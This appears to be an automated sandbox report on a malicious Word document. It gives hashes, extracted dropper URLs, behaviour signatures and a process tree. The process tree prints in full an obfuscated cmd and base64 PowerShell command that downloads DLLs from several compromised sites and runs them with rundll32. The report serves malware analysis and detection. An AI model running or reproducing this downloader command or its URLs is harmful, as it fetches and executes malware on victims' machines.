Analysis

  • max time kernel
    69s
  • max time network
    102s
  • platform
    windows7_x64
  • resource
    win7v20201028
  • submitted
    14-01-2021 10:05

General

  • Target

    Message_51332-8031180.doc

  • Size

    159KB

  • MD5

    3ee1b6abada683d816eb9a656c85e97e

  • SHA1

    b96462cba57d66b8c197ead0c410ff431781bab6

  • SHA256

    5765cfd784f1189797f090698edab7becc06910bff3b5c2609d76e2ffef2f922

  • SHA512

    90df4277ab5ac8a2b9141249dcccfb9a68857beb0ce1e1cc823dc321a60f0dc2812f21c517e2e55cde69fd238da82cd186a9781a4159cbdaccec4c23034fb1ca

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://ketorecipesfit.com/wp-admin/afanv/

exe.dropper

http://mertelofis.com/wp-content/As0/

exe.dropper

http://givingthanksdaily.com/CP/

exe.dropper

http://datawyse.net/0X3QY/

exe.dropper

http://cs.lcxxny.com/wp-includes/E3U8nn/

exe.dropper

http://makiyazhdoma.ru/blocked/tgEeW8M/

exe.dropper

http://trustseal.enamad.ir.redshopfa.com/admit/wJJvvG/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 5 IoCs
  • Loads dropped DLL 4 IoCs
  • Drops file in System32 directory 2 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 9 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 23 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Message_51332-8031180.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:1944
  • C:\Windows\system32\cmd.exe
    cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc cwBlAHQALQBWAEEAUgBJAEEAYgBMAGUAIAAgAG4AaQA5ADcARAAgACAAKAAgACAAWwBUAFkAcABlAF0AKAAiAHsANQB9AHsAMAB9AHsAMgB9AHsAMQB9AHsANAB9AHsAMwB9ACIAIAAtAEYAJwB0AEUAJwAsACcAUgBFACcALAAnAG0ALgBpAG8ALgBEAEkAJwAsACcATwBSAFkAJwAsACcAYwB0ACcALAAnAHMAWQBzACcAKQApACAAOwBTAGUAVAAtAEkAVABlAG0AIAAgACgAIgBWAGEAIgArACIAUgBpACIAKwAiAEEAYgBMAEUAOgBrAGgAMAAiACsAIgB6AHEAeQAiACkAIAAgACgAWwBUAHkAUABFAF0AKAAiAHsAMAB9AHsAMgB9AHsANwB9AHsANgB9AHsAMwB9AHsANAB9AHsANQB9AHsAMQB9ACIALQBGACAAJwBzAFkAcwBUAEUAJwAsACcARQBSACcALAAnAE0ALgBOACcALAAnAFMARQAnACwAJwByAHYAaQBjAGUAcABPAGkAbgB0ACcALAAnAG0AQQBuAGEAZwAnACwAJwAuACcALAAnAEUAVAAnACkAIAApACAAIAA7ACQAWgB1AGwANAA1AHAAdgA9ACQAQQA3ADUAUAAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAVQAyADQAQgA7ACQASgA2ADMARgA9ACgAJwBBAF8AJwArACcAOQBKACcAKQA7ACAAIAAkAG4ASQA5ADcARAA6ADoAIgBDAHIARQBgAEEAYABUAGUARABpAGAAUgBFAGMAdABvAHIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHQAJwArACcAZAAnACsAKAAnAFkAJwArACcAQgB2AHYAJwApACsAJwBqACcAKwAnAG4AZQAnACsAJwBlAHQAJwArACgAJwBkAFkARwAnACsAJwBoACcAKwAnAHEAcQBxAGcAdgB0AGQAJwApACsAJwBZACcAKQAuACIAUgBgAEUAYABQAGwAYQBjAGUAIgAoACgAJwB0ACcAKwAnAGQAWQAnACkALAAnAFwAJwApACkAKQA7ACQASQAwADkARQA9ACgAKAAnAEsAJwArACcANQAxACcAKQArACcAWAAnACkAOwAgACQAawBIADAAegBRAHkAOgA6ACIAUwBgAGUAQwBVAHIAYABpAHQAYAB5AFAAUgBPAFQATwBDAE8ATAAiACAAPQAgACgAKAAnAFQAJwArACcAbABzADEAJwApACsAJwAyACcAKQA7ACQARwAwAF8AQgA9ACgAJwBFAF8AJwArACcAMQBMACcAKQA7ACQASQA5AG0AeABoAG0AcwAgAD0AIAAoACcASwA0ACcAKwAnADIATgAnACkAOwAkAFAAOAAxAEIAPQAoACcATgA4ACcAKwAnADkAWQAnACkAOwAkAEwAdAB4AHAAaQA5AGUAPQAkAEgATwBNAEUAKwAoACgAKAAnAEMAJwArACcATQA0AEIAdgB2AGoAbgAnACsAJwBlAGUAQwAnACsAJwBNACcAKQArACcANABHACcAKwAnAGgAJwArACgAJwBxAHEAJwArACcAcQBnACcAKQArACcAdgBDACcAKwAnAE0ANAAnACkALgAiAFIAYABlAHAAbABBAGAAQwBlACIAKAAoACcAQwAnACsAJwBNADQAJwApACwAJwBcACcAKQApACsAJABJADkAbQB4AGgAbQBzACsAKAAnAC4AZAAnACsAJwBsAGwAJwApADsAJABFADAAMwBVAD0AKAAoACcASwAyACcAKwAnADUAJwApACsAJwBBACcAKQA7ACQARQBmADMAMwBzADQAcQA9ACgAJwBBACcAKwAoACcAXQBbAHEAWwBEACcAKwAnADoAJwApACsAKAAnAC8ALwAnACsAJwBrAGUAdABvACcAKQArACcAcgAnACsAKAAnAGUAJwArACcAYwBpACcAKQArACcAcABlACcAKwAoACcAcwBmAGkAdAAnACsAJwAuACcAKwAnAGMAbwBtAC8AdwBwACcAKQArACgAJwAtACcAKwAnAGEAZAAnACkAKwAnAG0AJwArACcAaQAnACsAJwBuACcAKwAnAC8AJwArACgAJwBhAGYAYQAnACsAJwBuACcAKQArACcAdgAvACcAKwAoACcAQAAnACsAJwBBAF0AJwApACsAKAAnAFsAcQAnACsAJwBbAEQAOgAnACkAKwAnAC8AJwArACgAJwAvAG0AZQAnACsAJwByACcAKQArACgAJwB0ACcAKwAnAGUAbABvAGYAaQBzACcAKQArACcALgAnACsAJwBjACcAKwAoACcAbwAnACsAJwBtAC8AdwAnACkAKwAoACcAcAAtACcAKwAnAGMAbwAnACkAKwAnAG4AJwArACgAJwB0ACcAKwAnAGUAbgAnACkAKwAoACcAdAAvACcAKwAnAEEAJwApACsAJwBzACcAKwAoACcAMAAvAEAAJwArACcAQQBdACcAKwAnAFsAJwApACsAJwBxAFsAJwArACcARAA6ACcAKwAoACcALwAnACsAJwAvAGcAaQAnACkAKwAoACcAdgBpACcAKwAnAG4AJwApACsAJwBnACcAKwAoACcAdABoAGEAJwArACcAbgBrAHMAJwApACsAKAAnAGQAYQAnACsAJwBpACcAKQArACgAJwBsAHkALgBjAG8AJwArACcAbQAnACsAJwAvAEMAUAAvACcAKQArACgAJwBAAEEAJwArACcAXQAnACkAKwAoACcAWwAnACsAJwBxACcAKwAnAFsARAA6AC8ALwBkAGEAdAAnACsAJwBhAHcAeQAnACkAKwAnAHMAZQAnACsAKAAnAC4AbgAnACsAJwBlACcAKQArACcAdAAvACcAKwAoACcAMABYADMAUQAnACsAJwBZACcAKQArACcALwBAACcAKwAoACcAQQBdACcAKwAnAFsAcQBbACcAKQArACgAJwBEADoALwAvAGMAJwArACcAcwAnACkAKwAoACcALgBsAGMAeAB4AG4AeQAnACsAJwAuACcAKQArACgAJwBjACcAKwAnAG8AbQAnACkAKwAnAC8AdwAnACsAJwBwACcAKwAnAC0AaQAnACsAKAAnAG4AYwAnACsAJwBsACcAKQArACgAJwB1AGQAJwArACcAZQBzACcAKwAnAC8AJwArACcARQAzACcAKwAnAFUAOABuAG4ALwBAAEEAXQAnACsAJwBbAHEAWwBEADoAJwArACcALwAnACsAJwAvAG0AJwApACsAKAAnAGEAJwArACcAawBpACcAKQArACcAeQAnACsAKAAnAGEAegBoACcAKwAnAGQAJwApACsAKAAnAG8AbQAnACsAJwBhAC4AcgAnACsAJwB1ACcAKQArACcALwAnACsAJwBiACcAKwAoACcAbABvAGMAawBlACcAKwAnAGQAJwArACcALwB0AGcAJwApACsAJwBFAGUAJwArACcAVwAnACsAKAAnADgATQAnACsAJwAvACcAKQArACgAJwBAAEEAJwArACcAXQBbAHEAJwArACcAWwBEADoALwAvACcAKQArACcAdAAnACsAKAAnAHIAJwArACcAdQBzAHQAcwAnACsAJwBlAGEAbAAuAGUAbgAnACkAKwAoACcAYQAnACsAJwBtAGEAZAAuACcAKwAnAGkAcgAnACkAKwAoACcALgByACcAKwAnAGUAZAAnACkAKwAnAHMAaAAnACsAKAAnAG8AcAAnACsAJwBmAGEALgBjACcAKwAnAG8AbQAvAGEAJwApACsAKAAnAGQAbQAnACsAJwBpAHQAJwArACcALwB3AEoASgB2AHYARwAvACcAKQApAC4AIgByAEUAcABsAEEAYABDAGUAIgAoACgAKAAnAEEAJwArACcAXQBbAHEAJwApACsAJwBbAEQAJwApACwAKABbAGEAcgByAGEAeQBdACgAKAAnAGQAcwAnACsAKAAnAGUAdwAnACsAJwBmACcAKQApACwAKAAoACcAdwBlACcAKwAnAHYAJwApACsAJwB3AGUAJwApACkALAAoACgAJwBhAGUAJwArACcAZgAnACkAKwAnAGYAJwApACwAKAAnAGgAdAAnACsAJwB0AHAAJwApACkAWwAyAF0AKQAuACIAcwBwAGAATABpAFQAIgAoACQATwA3ADMATAAgACsAIAAkAFoAdQBsADQANQBwAHYAIAArACAAJABBAF8ANABDACkAOwAkAEEAOAAzAEsAPQAoACgAJwBVADQAJwArACcAXwAnACkAKwAnAE0AJwApADsAZgBvAHIAZQBhAGMAaAAgACgAJABRAHYAdABuAGQAdgBfACAAaQBuACAAJABFAGYAMwAzAHMANABxACkAewB0AHIAeQB7ACgAJgAoACcATgAnACsAJwBlAHcALQBPAGIAagAnACsAJwBlAGMAdAAnACkAIABTAFkAUwBUAEUATQAuAG4AZQBUAC4AVwBFAEIAYwBsAGkAZQBOAFQAKQAuACIAZABPAHcATgBgAEwATwBBAGQAYABGAEkATABFACIAKAAkAFEAdgB0AG4AZAB2AF8ALAAgACQATAB0AHgAcABpADkAZQApADsAJABOADEAMQBDAD0AKAAoACcASQAnACsAJwA5ADMAJwApACsAJwBLACcAKQA7AEkAZgAgACgAKAAmACgAJwBHAGUAJwArACcAdAAtAEkAdABlAG0AJwApACAAJABMAHQAeABwAGkAOQBlACkALgAiAGwARQBuAGAAZwBgAFQAaAAiACAALQBnAGUAIAA0ADYAOAA1ADUAKQAgAHsAJgAoACcAcgB1ACcAKwAnAG4AZABsAGwAJwArACcAMwAyACcAKQAgACQATAB0AHgAcABpADkAZQAsACgAJwBTACcAKwAoACcAaAAnACsAJwBvACcAKwAnAHcARABpAGEAbAAnACkAKwAoACcAbwBnACcAKwAnAEEAJwApACkALgAiAHQAbwBzAFQAYABSAGkAYABOAGcAIgAoACkAOwAkAFgAMgBfAEYAPQAoACcATAA3ACcAKwAnADIASwAnACkAOwBiAHIAZQBhAGsAOwAkAEwAOAA4AFgAPQAoACcAUQAwACcAKwAnADcARwAnACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEYAXwA2AEMAPQAoACgAJwBOADIAJwArACcAMAAnACkAKwAnAFAAJwApAA==
    1⤵
    • Process spawned unexpected child process
    • Suspicious use of WriteProcessMemory
    PID:776
    • C:\Windows\system32\msg.exe
      msg Admin /v Word experienced an error trying to open the file.
      2⤵
        PID:1588
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -w hidden -enc cwBlAHQALQBWAEEAUgBJAEEAYgBMAGUAIAAgAG4AaQA5ADcARAAgACAAKAAgACAAWwBUAFkAcABlAF0AKAAiAHsANQB9AHsAMAB9AHsAMgB9AHsAMQB9AHsANAB9AHsAMwB9ACIAIAAtAEYAJwB0AEUAJwAsACcAUgBFACcALAAnAG0ALgBpAG8ALgBEAEkAJwAsACcATwBSAFkAJwAsACcAYwB0ACcALAAnAHMAWQBzACcAKQApACAAOwBTAGUAVAAtAEkAVABlAG0AIAAgACgAIgBWAGEAIgArACIAUgBpACIAKwAiAEEAYgBMAEUAOgBrAGgAMAAiACsAIgB6AHEAeQAiACkAIAAgACgAWwBUAHkAUABFAF0AKAAiAHsAMAB9AHsAMgB9AHsANwB9AHsANgB9AHsAMwB9AHsANAB9AHsANQB9AHsAMQB9ACIALQBGACAAJwBzAFkAcwBUAEUAJwAsACcARQBSACcALAAnAE0ALgBOACcALAAnAFMARQAnACwAJwByAHYAaQBjAGUAcABPAGkAbgB0ACcALAAnAG0AQQBuAGEAZwAnACwAJwAuACcALAAnAEUAVAAnACkAIAApACAAIAA7ACQAWgB1AGwANAA1AHAAdgA9ACQAQQA3ADUAUAAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAVQAyADQAQgA7ACQASgA2ADMARgA9ACgAJwBBAF8AJwArACcAOQBKACcAKQA7ACAAIAAkAG4ASQA5ADcARAA6ADoAIgBDAHIARQBgAEEAYABUAGUARABpAGAAUgBFAGMAdABvAHIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHQAJwArACcAZAAnACsAKAAnAFkAJwArACcAQgB2AHYAJwApACsAJwBqACcAKwAnAG4AZQAnACsAJwBlAHQAJwArACgAJwBkAFkARwAnACsAJwBoACcAKwAnAHEAcQBxAGcAdgB0AGQAJwApACsAJwBZACcAKQAuACIAUgBgAEUAYABQAGwAYQBjAGUAIgAoACgAJwB0ACcAKwAnAGQAWQAnACkALAAnAFwAJwApACkAKQA7ACQASQAwADkARQA9ACgAKAAnAEsAJwArACcANQAxACcAKQArACcAWAAnACkAOwAgACQAawBIADAAegBRAHkAOgA6ACIAUwBgAGUAQwBVAHIAYABpAHQAYAB5AFAAUgBPAFQATwBDAE8ATAAiACAAPQAgACgAKAAnAFQAJwArACcAbABzADEAJwApACsAJwAyACcAKQA7ACQARwAwAF8AQgA9ACgAJwBFAF8AJwArACcAMQBMACcAKQA7ACQASQA5AG0AeABoAG0AcwAgAD0AIAAoACcASwA0ACcAKwAnADIATgAnACkAOwAkAFAAOAAxAEIAPQAoACcATgA4ACcAKwAnADkAWQAnACkAOwAkAEwAdAB4AHAAaQA5AGUAPQAkAEgATwBNAEUAKwAoACgAKAAnAEMAJwArACcATQA0AEIAdgB2AGoAbgAnACsAJwBlAGUAQwAnACsAJwBNACcAKQArACcANABHACcAKwAnAGgAJwArACgAJwBxAHEAJwArACcAcQBnACcAKQArACcAdgBDACcAKwAnAE0ANAAnACkALgAiAFIAYABlAHAAbABBAGAAQwBlACIAKAAoACcAQwAnACsAJwBNADQAJwApACwAJwBcACcAKQApACsAJABJADkAbQB4AGgAbQBzACsAKAAnAC4AZAAnACsAJwBsAGwAJwApADsAJABFADAAMwBVAD0AKAAoACcASwAyACcAKwAnADUAJwApACsAJwBBACcAKQA7ACQARQBmADMAMwBzADQAcQA9ACgAJwBBACcAKwAoACcAXQBbAHEAWwBEACcAKwAnADoAJwApACsAKAAnAC8ALwAnACsAJwBrAGUAdABvACcAKQArACcAcgAnACsAKAAnAGUAJwArACcAYwBpACcAKQArACcAcABlACcAKwAoACcAcwBmAGkAdAAnACsAJwAuACcAKwAnAGMAbwBtAC8AdwBwACcAKQArACgAJwAtACcAKwAnAGEAZAAnACkAKwAnAG0AJwArACcAaQAnACsAJwBuACcAKwAnAC8AJwArACgAJwBhAGYAYQAnACsAJwBuACcAKQArACcAdgAvACcAKwAoACcAQAAnACsAJwBBAF0AJwApACsAKAAnAFsAcQAnACsAJwBbAEQAOgAnACkAKwAnAC8AJwArACgAJwAvAG0AZQAnACsAJwByACcAKQArACgAJwB0ACcAKwAnAGUAbABvAGYAaQBzACcAKQArACcALgAnACsAJwBjACcAKwAoACcAbwAnACsAJwBtAC8AdwAnACkAKwAoACcAcAAtACcAKwAnAGMAbwAnACkAKwAnAG4AJwArACgAJwB0ACcAKwAnAGUAbgAnACkAKwAoACcAdAAvACcAKwAnAEEAJwApACsAJwBzACcAKwAoACcAMAAvAEAAJwArACcAQQBdACcAKwAnAFsAJwApACsAJwBxAFsAJwArACcARAA6ACcAKwAoACcALwAnACsAJwAvAGcAaQAnACkAKwAoACcAdgBpACcAKwAnAG4AJwApACsAJwBnACcAKwAoACcAdABoAGEAJwArACcAbgBrAHMAJwApACsAKAAnAGQAYQAnACsAJwBpACcAKQArACgAJwBsAHkALgBjAG8AJwArACcAbQAnACsAJwAvAEMAUAAvACcAKQArACgAJwBAAEEAJwArACcAXQAnACkAKwAoACcAWwAnACsAJwBxACcAKwAnAFsARAA6AC8ALwBkAGEAdAAnACsAJwBhAHcAeQAnACkAKwAnAHMAZQAnACsAKAAnAC4AbgAnACsAJwBlACcAKQArACcAdAAvACcAKwAoACcAMABYADMAUQAnACsAJwBZACcAKQArACcALwBAACcAKwAoACcAQQBdACcAKwAnAFsAcQBbACcAKQArACgAJwBEADoALwAvAGMAJwArACcAcwAnACkAKwAoACcALgBsAGMAeAB4AG4AeQAnACsAJwAuACcAKQArACgAJwBjACcAKwAnAG8AbQAnACkAKwAnAC8AdwAnACsAJwBwACcAKwAnAC0AaQAnACsAKAAnAG4AYwAnACsAJwBsACcAKQArACgAJwB1AGQAJwArACcAZQBzACcAKwAnAC8AJwArACcARQAzACcAKwAnAFUAOABuAG4ALwBAAEEAXQAnACsAJwBbAHEAWwBEADoAJwArACcALwAnACsAJwAvAG0AJwApACsAKAAnAGEAJwArACcAawBpACcAKQArACcAeQAnACsAKAAnAGEAegBoACcAKwAnAGQAJwApACsAKAAnAG8AbQAnACsAJwBhAC4AcgAnACsAJwB1ACcAKQArACcALwAnACsAJwBiACcAKwAoACcAbABvAGMAawBlACcAKwAnAGQAJwArACcALwB0AGcAJwApACsAJwBFAGUAJwArACcAVwAnACsAKAAnADgATQAnACsAJwAvACcAKQArACgAJwBAAEEAJwArACcAXQBbAHEAJwArACcAWwBEADoALwAvACcAKQArACcAdAAnACsAKAAnAHIAJwArACcAdQBzAHQAcwAnACsAJwBlAGEAbAAuAGUAbgAnACkAKwAoACcAYQAnACsAJwBtAGEAZAAuACcAKwAnAGkAcgAnACkAKwAoACcALgByACcAKwAnAGUAZAAnACkAKwAnAHMAaAAnACsAKAAnAG8AcAAnACsAJwBmAGEALgBjACcAKwAnAG8AbQAvAGEAJwApACsAKAAnAGQAbQAnACsAJwBpAHQAJwArACcALwB3AEoASgB2AHYARwAvACcAKQApAC4AIgByAEUAcABsAEEAYABDAGUAIgAoACgAKAAnAEEAJwArACcAXQBbAHEAJwApACsAJwBbAEQAJwApACwAKABbAGEAcgByAGEAeQBdACgAKAAnAGQAcwAnACsAKAAnAGUAdwAnACsAJwBmACcAKQApACwAKAAoACcAdwBlACcAKwAnAHYAJwApACsAJwB3AGUAJwApACkALAAoACgAJwBhAGUAJwArACcAZgAnACkAKwAnAGYAJwApACwAKAAnAGgAdAAnACsAJwB0AHAAJwApACkAWwAyAF0AKQAuACIAcwBwAGAATABpAFQAIgAoACQATwA3ADMATAAgACsAIAAkAFoAdQBsADQANQBwAHYAIAArACAAJABBAF8ANABDACkAOwAkAEEAOAAzAEsAPQAoACgAJwBVADQAJwArACcAXwAnACkAKwAnAE0AJwApADsAZgBvAHIAZQBhAGMAaAAgACgAJABRAHYAdABuAGQAdgBfACAAaQBuACAAJABFAGYAMwAzAHMANABxACkAewB0AHIAeQB7ACgAJgAoACcATgAnACsAJwBlAHcALQBPAGIAagAnACsAJwBlAGMAdAAnACkAIABTAFkAUwBUAEUATQAuAG4AZQBUAC4AVwBFAEIAYwBsAGkAZQBOAFQAKQAuACIAZABPAHcATgBgAEwATwBBAGQAYABGAEkATABFACIAKAAkAFEAdgB0AG4AZAB2AF8ALAAgACQATAB0AHgAcABpADkAZQApADsAJABOADEAMQBDAD0AKAAoACcASQAnACsAJwA5ADMAJwApACsAJwBLACcAKQA7AEkAZgAgACgAKAAmACgAJwBHAGUAJwArACcAdAAtAEkAdABlAG0AJwApACAAJABMAHQAeABwAGkAOQBlACkALgAiAGwARQBuAGAAZwBgAFQAaAAiACAALQBnAGUAIAA0ADYAOAA1ADUAKQAgAHsAJgAoACcAcgB1ACcAKwAnAG4AZABsAGwAJwArACcAMwAyACcAKQAgACQATAB0AHgAcABpADkAZQAsACgAJwBTACcAKwAoACcAaAAnACsAJwBvACcAKwAnAHcARABpAGEAbAAnACkAKwAoACcAbwBnACcAKwAnAEEAJwApACkALgAiAHQAbwBzAFQAYABSAGkAYABOAGcAIgAoACkAOwAkAFgAMgBfAEYAPQAoACcATAA3ACcAKwAnADIASwAnACkAOwBiAHIAZQBhAGsAOwAkAEwAOAA4AFgAPQAoACcAUQAwACcAKwAnADcARwAnACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEYAXwA2AEMAPQAoACgAJwBOADIAJwArACcAMAAnACkAKwAnAFAAJwApAA==
        2⤵
        • Blocklisted process makes network request
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1164
        • C:\Windows\system32\rundll32.exe
          "C:\Windows\system32\rundll32.exe" C:\Users\Admin\Bvvjnee\Ghqqqgv\K42N.dll ShowDialogA
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:432
          • C:\Windows\SysWOW64\rundll32.exe
            "C:\Windows\system32\rundll32.exe" C:\Users\Admin\Bvvjnee\Ghqqqgv\K42N.dll ShowDialogA
            4⤵
            • Loads dropped DLL
            • Drops file in System32 directory
            • Suspicious use of WriteProcessMemory
            PID:1396
            • C:\Windows\SysWOW64\rundll32.exe
              C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Thumrsbswzrkv\wmhqfadjlxak.tue",ShowDialogA
              5⤵
              • Blocklisted process makes network request
              • Suspicious behavior: EnumeratesProcesses
              PID:1688

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Defense Evasion

    Modify Registry

    1
    T1112

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\Bvvjnee\Ghqqqgv\K42N.dll
      MD5

      a85ef3f998b9892560a701032b335e9a

      SHA1

      6fbe516c5d289ca596d4e1344ee0ca2524ace6ce

      SHA256

      ac26d9375298cb9e53ce430f8319b9393790651ca0d278ad2d6b042e6745d81b

      SHA512

      bfbee7e54c8d9e042171a0c26ae87b81cc241d72516d2e79ec7515403f523d1f45c52d23efe827537c024908fae45617eac1d5c1dc12698b946f48019478ce93

    • \Users\Admin\Bvvjnee\Ghqqqgv\K42N.dll
      MD5

      a85ef3f998b9892560a701032b335e9a

      SHA1

      6fbe516c5d289ca596d4e1344ee0ca2524ace6ce

      SHA256

      ac26d9375298cb9e53ce430f8319b9393790651ca0d278ad2d6b042e6745d81b

      SHA512

      bfbee7e54c8d9e042171a0c26ae87b81cc241d72516d2e79ec7515403f523d1f45c52d23efe827537c024908fae45617eac1d5c1dc12698b946f48019478ce93

    • \Users\Admin\Bvvjnee\Ghqqqgv\K42N.dll
      MD5

      a85ef3f998b9892560a701032b335e9a

      SHA1

      6fbe516c5d289ca596d4e1344ee0ca2524ace6ce

      SHA256

      ac26d9375298cb9e53ce430f8319b9393790651ca0d278ad2d6b042e6745d81b

      SHA512

      bfbee7e54c8d9e042171a0c26ae87b81cc241d72516d2e79ec7515403f523d1f45c52d23efe827537c024908fae45617eac1d5c1dc12698b946f48019478ce93

    • \Users\Admin\Bvvjnee\Ghqqqgv\K42N.dll
      MD5

      a85ef3f998b9892560a701032b335e9a

      SHA1

      6fbe516c5d289ca596d4e1344ee0ca2524ace6ce

      SHA256

      ac26d9375298cb9e53ce430f8319b9393790651ca0d278ad2d6b042e6745d81b

      SHA512

      bfbee7e54c8d9e042171a0c26ae87b81cc241d72516d2e79ec7515403f523d1f45c52d23efe827537c024908fae45617eac1d5c1dc12698b946f48019478ce93

    • \Users\Admin\Bvvjnee\Ghqqqgv\K42N.dll
      MD5

      a85ef3f998b9892560a701032b335e9a

      SHA1

      6fbe516c5d289ca596d4e1344ee0ca2524ace6ce

      SHA256

      ac26d9375298cb9e53ce430f8319b9393790651ca0d278ad2d6b042e6745d81b

      SHA512

      bfbee7e54c8d9e042171a0c26ae87b81cc241d72516d2e79ec7515403f523d1f45c52d23efe827537c024908fae45617eac1d5c1dc12698b946f48019478ce93

    • memory/432-13-0x0000000000000000-mapping.dmp
    • memory/1164-7-0x0000000002460000-0x0000000002461000-memory.dmp
      Filesize

      4KB

    • memory/1164-6-0x000007FEF5180000-0x000007FEF5B6C000-memory.dmp
      Filesize

      9.9MB

    • memory/1164-10-0x00000000024A0000-0x00000000024A1000-memory.dmp
      Filesize

      4KB

    • memory/1164-11-0x000000001B6A0000-0x000000001B6A1000-memory.dmp
      Filesize

      4KB

    • memory/1164-12-0x000000001AA80000-0x000000001AA81000-memory.dmp
      Filesize

      4KB

    • memory/1164-8-0x000000001ABB0000-0x000000001ABB1000-memory.dmp
      Filesize

      4KB

    • memory/1164-5-0x0000000000000000-mapping.dmp
    • memory/1164-9-0x00000000025B0000-0x00000000025B1000-memory.dmp
      Filesize

      4KB

    • memory/1396-15-0x0000000000000000-mapping.dmp
    • memory/1572-21-0x000007FEF6080000-0x000007FEF62FA000-memory.dmp
      Filesize

      2.5MB

    • memory/1588-4-0x0000000000000000-mapping.dmp
    • memory/1688-20-0x0000000000000000-mapping.dmp
    • memory/1944-2-0x0000000000273000-0x0000000000277000-memory.dmp
      Filesize

      16KB

    • memory/1944-3-0x0000000000273000-0x0000000000277000-memory.dmp
      Filesize

      16KB